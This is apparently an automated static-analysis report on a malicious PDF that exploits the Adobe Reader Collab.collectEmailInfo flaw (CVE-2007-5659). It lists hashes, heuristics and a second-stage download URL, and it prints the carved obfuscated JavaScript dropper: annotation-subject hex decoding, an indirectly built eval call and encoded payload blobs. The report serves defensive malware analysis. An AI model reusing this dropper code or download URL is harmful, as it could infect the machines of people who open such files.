Malicious PDF — malware analysis report

Static analysis result for SHA-256 77b87a4cc942affc…

MALICIOUS

PDF

15.9 KB
MD5: 8ab268aebd6278bc867ebc5a2faca92c SHA-1: abcc71542a1240e8670480aeb63ef00b11c89240 SHA-256: 77b87a4cc942affc7b0a3c0ff4f08ace7b57e867bc677df29271fccc3d567876
366 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed to download a second-stage payload from the URL http://searchfunes.org/cgi-bin/153/n002106201r0019R0cf18aa2X6b83b35bY42ed9557Z0100f060. The presence of multiple critical and high severity heuristics related to PDF JavaScript exploits and droppers strongly indicates malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after static deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 5 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, hex_dashed_payload, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://searchfunes.org/cgi-bin/153/n002106201r0019R0cf18aa2X6b83b35bY42ed9557Z0100f060 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0005_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 5 at offset 0x148 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js
ca80bec4d18c459afd0bd3b9115f8c91c9674c3b3ec6276503b24757d719e0a7		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1AFD 12674 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function dld__18g(ph311ONQDi, v_382R2_QDY2i){var Cxt3__4wu3sa = 20;var qtb5__c_al = 0;var jOv5V6Ef2_4_t = 512;var IjJj5_8FH_7G = Cxt3__4wu3sa;var Q1LOPAnu = "";var RK7vE_S_Hxi_5 = 4;var jVB__4 = this;var M74mW7J7 = "1234ee";var o1JPS_wrP = arguments;try {var oa_Cgu = 0;if (app) {IjJj5_8FH_7G = IjJj5_8FH_7G + 2;v_382R2_QDY2i = pr[oa_Cgu].subject;}M74mW7J7 = M74mW7J7.replace(/\d+/, "call");} catch(e) { }IjJj5_8FH_7G = IjJj5_8FH_7G - Cxt3__4wu3sa;var sBOT5H_L___ra = new Array();var lH4P_v = 150;if (lH4P_v > 0) {sBOT5H_L___ra[0] = lH4P_v;sBOT5H_L___ra[1] = jOv5V6Ef2_4_t;sBOT5H_L___ra[0] = sBOT5H_L___ra[0] - lH4P_v;sBOT5H_L___ra[2] = sBOT5H_L___ra[0];sBOT5H_L___ra[1] = sBOT5H_L___ra[1] - jOv5V6Ef2_4_t;sBOT5H_L___ra[3] = sBOT5H_L___ra[1];}if (ph311ONQDi) { sBOT5H_L___ra = ph311ONQDi;}if (!ph311ONQDi) {var NI__XmCNY = o1JPS_wrP[M74mW7J7].toString();var o_8ap__wLC_vO = 0;var Mn6_1T = o_8ap__wLC_vO;lH4P_v = lH4P_v - 102;var m_8D3__OfF6r = 0;while(Mn6_1T < NI__XmCNY.length) {m_8D3__OfF6r = NI__XmCNY.charCodeAt(Mn6_1T);if (m_8D3__OfF6r >= lH4P_v && m_8D3__OfF6r <= 57) {if (o_8ap__wLC_vO == RK7vE_S_Hxi_5) {o_8ap__wLC_vO = -1;}if (o_8ap__wLC_vO < 0) { o_8ap__wLC_vO = 0; }sBOT5H_L___ra[o_8ap__wLC_vO] += m_8D3__OfF6r;if (sBOT5H_L___ra[o_8ap__wLC_vO] > jOv5V6Ef2_4_t) {sBOT5H_L___ra[o_8ap__wLC_vO] -= jOv5V6Ef2_4_t;}o_8ap__wLC_vO = o_8ap__wLC_vO + 1;}Mn6_1T = Mn6_1T + 1;}}var mVTTS_0v = 0;var iYc__fj = 0;var q_F86__3___on = -1;var r1Mx7h_ii = 0;var lr0Knp__4__i_AX = 0;do {var Jol6__0w1C = 256;if (sBOT5H_L___ra[r1Mx7h_ii] > Jol6__0w1C) {sBOT5H_L___ra[r1Mx7h_ii] -= Jol6__0w1C;}r1Mx7h_ii = r1Mx7h_ii + 1;} while (r1Mx7h_ii < RK7vE_S_Hxi_5);r1Mx7h_ii = r1Mx7h_ii - RK7vE_S_Hxi_5;while(r1Mx7h_ii < v_382R2_QDY2i.length) {var RN_g1r = v_382R2_QDY2i.substr(r1Mx7h_ii, 1) + ' V V ';r1Mx7h_ii = r1Mx7h_ii + 1;var kt_Ew3 = parseInt(RN_g1r, Cxt3__4wu3sa);if (q_F86__3___on != -1) {iYc__fj += kt_Ew3;if (mVTTS_0v == RK7vE_S_Hxi_5) {mVTTS_0v = 0;}var d25kqKfB_d8_lr = iYc__fj;d25kqKfB_d8_lr = d25kqKfB_d8_lr - (lr0Knp__4__i_AX + 2) * sBOT5H_L___ra[mVTTS_0v];if (d25kqKfB_d8_lr <= 0) {d25kqKfB_d8_lr = d25kqKfB_d8_lr - Math.floor(d25kqKfB_d8_lr / 256) * 256;}d25kqKfB_d8_lr = String.fromCharCode(d25kqKfB_d8_lr);if (IjJj5_8FH_7G == 1) {Q1LOPAnu += kt_Ew3;} else if (IjJj5_8FH_7G == 2) {Q1LOPAnu += d25kqKfB_d8_lr;} else {Q1LOPAnu += r1Mx7h_ii;q_F86__3___on = -2;}q_F86__3___on = -1;mVTTS_0v = mVTTS_0v + 1;lr0Knp__4__i_AX = lr0Knp__4__i_AX + 1;} else if (q_F86__3___on == -1) {q_F86__3___on = Cxt3__4wu3sa;iYc__fj = kt_Ew3 * Cxt3__4wu3sa;}}var DI_2K_8cn_7y3k = this;DI_2K_8cn_7y3k['ev'+'al'](Q1LOPAnu);}
	dld__18g(0, "8873b29fb84g39103h3f8g0g8e3cca23c62i552b4jaec678019a2d994gbbah73638936b8205i72a9427h03bibh4738c71b268c2698474a27c60g6f674g1h1b6ga91c4c6b0j9296815hb8610901aiah1i5c5a432f9h568g44c25j12357a60677g073hb08j1ec63875a2c6a7ai22aj27bf79018h118fc11a284c6670188d65b32h084g1d6d2e43606j8c5acc9i314251ae7a350f0808b8641a4d0iba2cb0bh080g0db88d5h468fbg44a67h728a2677ai719d4h327703126i8h513837199230812h0ic9c70ja1c55j2d089ja75f6e7c298g826j646b1d460j96627577beb844bdc256463204bjc690cf42bj372a7hag863dafc0be7j57b8739faa7d9092155i5fba755096bgb55a34c12j5j5b066f0623591f34304e601j9774c5cd439632867h6f9ea732c6177j860j3692ad16916d36251037b21d95573e6a1a40645i49c62b86a9b8628c1dbi008h63c72897a7737dc25790cccb6f7j97312358b046685j436gcd3hbf8i3acf1d67ad0992bgc1072jc669cd70ab9f7ac31d4b755h468d85bj47b4824b5i6i6g9d8db51ic575071d7db14ic6bbb913bd551655cdb7177gc239452hb6901f5f77ag409f4e7j4b3d60016i9f614baa2d3a6ga43e0004a58ec14g0i381bb3389dc55j5a0a95847c6baa4j7g82939e5f0e6916b465677jbe0d5hc0ad66436222be327c0013b2121g4e1d5c4ic4cfbj785dad6f9a9666a96jc05i2889593ibdcca23f0c1a50595g3c88180f3e04bi492b5d08c94ibf09438a4dae68765e9j0094be91820e3e8bbic1b161420i4f6jc34b8f4i3h2f030i6h4f5928275jb3c84i9e21ag9ibf7jbg570f066e8caf2i5jcc3i6e73641gce651a624e5f564dc135a64j2bc6167364b2737f13ai05a369c88bb7c39cb22631803j0ba398b561aa7e3f445h5h847ia21a01632f3c52b390250h08050660b1660d9j33b4bj3i3ica7j6a245d9b1a339e8a6b584d6db0928i3054ag2c4db0c73e170ha39bbj4g360i160b1091c5504e0a7i9d2j347a0i478d5aa08i13791j97895a5b8b23570c165j0e5h217a
... (truncated)
deobfuscated.js
0adc54e4bd37ed41e7cf861c83a20dde6f3d6314ccbbf5807adeffe16ce77c79		 deobfuscated-js PDF JavaScript deobfuscation pass 79007 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app.eval(buf);
}

8873b29fb84g39103h3f8g0g8e3cca23c62i552b4jaec678019a2d994gbbah73638936b8205i72a9427h03bibh4738c71b268c2698474a27c60g6f674g1h1b6ga91c4c6b0j9296815hb8610901aiah1i5c5a432f9h568g44c25j12357a60677g073hb08j1ec63875a2c6a7ai22aj27bf79018h118fc11a284c6670188d65b32h084g1d6d2e43606j8c5acc9i314251ae7a350f0808b8641a4d0iba2cb0bh080g0db88d5h468fbg44a67h728a2677ai719d4h327703126i8h513837199230812h0ic9c70ja1c55j2d089ja75f6e7c298g826j646b1d460j96627577beb844bdc256463204bjc690cf42bj372a7hag863dafc0be7j57b8739faa7d9092155i5fba755096bgb55a34c12j5j5b066f0623591f34304e601j9774c5cd439632867h6f9ea732c6177j860j3692ad16916d36251037b21d95573e6a1a40645i49c62b86a9b8628c1dbi008h63c72897a7737dc25790cccb6f7j97312358b046685j436gcd3hbf8i3acf1d67ad0992bgc1072jc669cd70ab9f7ac31d4b755h468d85bj47b4824b5i6i6g9d8db51ic575071d7db14ic6bbb913bd551655cdb7177gc239452hb6901f5f77ag409f4e7j4b3d60016i9f614baa2d3a6ga43e0004a58ec14g0i381bb3389dc55j5a0a95847c6baa4j7g82939e5f0e6916b465677jbe0d5hc0ad66436222be327c0013b2121g4e1d5c4ic4cfbj785dad6f9a9666a96jc05i2889593ibdcca23f0c1a50595g3c88180f3e04bi492b5d08c94ibf09438a4dae68765e9j0094be91820e3e8bbic1b161420i4f6jc34b8f4i3h2f030i6h4f5928275jb3c84i9e21ag9ibf7jbg570f066e8caf2i5jcc3i6e73641gce651a624e5f564dc135a64j2bc6167364b2737f13ai05a369c88bb7c39cb22631803j0ba398b561aa7e3f445h5h847ia21a01632f3c52b390250h08050660b1660d9j33b4bj3i3ica7j6a245d9b1a339e8a6b584d6db0928i3054ag2c4db0c73e170ha39bbj4g360i160b1091c5504e0a7i9d2j347a0i478d5aa08i13791j97895a5b8b23570c165j0e5h217aceb8320b19373b7hc6666b07cc1f875a7a3d706i74996j3d5258ba4j71a3bjc552c8cc161c5g0b681da85g1702413b6d1cc74fc7bc228a35a068845e74cf85ae69480b615b0316a26d4gc70d267i3754120j27030i6h4f5928275jb3c84i9e21agabc17jc2610d0c6ea1bf2f6a2j31ad52912h0065073h556b6e7g0041008c513814929519ac8f230527c66cbj7f1995a3a8353i9i63286e7hc72g23521437484b727ibb562286382b738f72279h0e181362a74h0e91cba5bd1h4b1f958g4i8f7ic933af4e76805h3aa9a1ac5b5h7fbc1475a280333aa3b91h5c0922b20d3699b13e54ai9784716aa647649685ab6c4f5a03b98b7444c3c651ac063a1e6cc39709a03f111j3e1752a6944f019e17532ibi48787h8e006j0b525ebf7e798hajbh71092g2a248g30a94ac9511i2b784i70b28a44cfa61g59138f686g7372c990b35i8j08684ea41f9i6d382e1236c41f6j212g63a2095g4h2603cd53b80i78a217a6bjc657c730a10aa3b21a5i9205c3b5719428ca6513408247576jc153ac6c410645677bb2aeb31i0d11a7610559249a8417383ga96g4d5i8ea052ba711c47723a7h5ea256b86ece164c7b5gc7afbe05ba3ebb2icfab2a91943d070f729a537i99cd47c19145902e4403a49g695cb92750a7934a0ac40jae1h5g1i1ib61g0j7fa15457b795017c6e8e3j57b56a74a31263cb9b92325d8bb33506126c0e2c0e9d06bf322hc42a386hce943db707b05c1i864j5b91899gb225852ead63619g0ba04741b32e1a6e1c7839194j20156a4g6dbiac74940a499545caa0825e95138j21917bad546fbj0jba4841400d2h850j9d583d69a2218j4i65191h86a90j4c7809c5ccc84a971gb1b77ga71g5a901j2h8j79682j233g135f73604j7ac643a5931a1d3773a5199f8h0cbj17bj6i9c65248f84183231aa6e44988d882gbc471j70642e686iah2d2b8i373973b05ecfa7c20a272e175b0caj33ae86191gc27j5h1f8h5i0366a98d63804d6dc56f77354baf3312858f3g0ec6a395ba6j1i2119033c91c56527bf8hb7677b810g90ah9a7h6b397d0db77f557cbe1j3ib502622e57c7ad0a8c470a03133f8a035c449eah17565ha5718ea19f9g7g01855000597a9002a25h0cc35e266h0e8e42aj1ecd3f534e4621bb729cbg317a3abi7688a37209830d9i61a76181bd27a75d5g2e4b46993i5i4312630f3g977j5ibacf5382a6526b07a9bjbj638e4jceb7ai9d02528d451787758g2f21420j334i6640589h32c880120j14696ibi6e9211120h9j69c1691jaf9d0c264j86453a9272b32j0h4i1c7f3a4b6j73ba1abj630f3740904ic0a49fa0c15cc755aaabcf82ce0g24059a941f4h77ag41ad876i4b1i3ibb9j83324bae0b5695ai72313hc3a7c48c244g111c3f5i9f2g3e058ec762657g3268a5869g6d1j8fc1735b325290a669c713431a571i973ea12232194d376701944f019e17532ibi48787h8e00a0bi6b1c894i4e72b20j713420524j581i89121f461d04564c5d0ec0
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.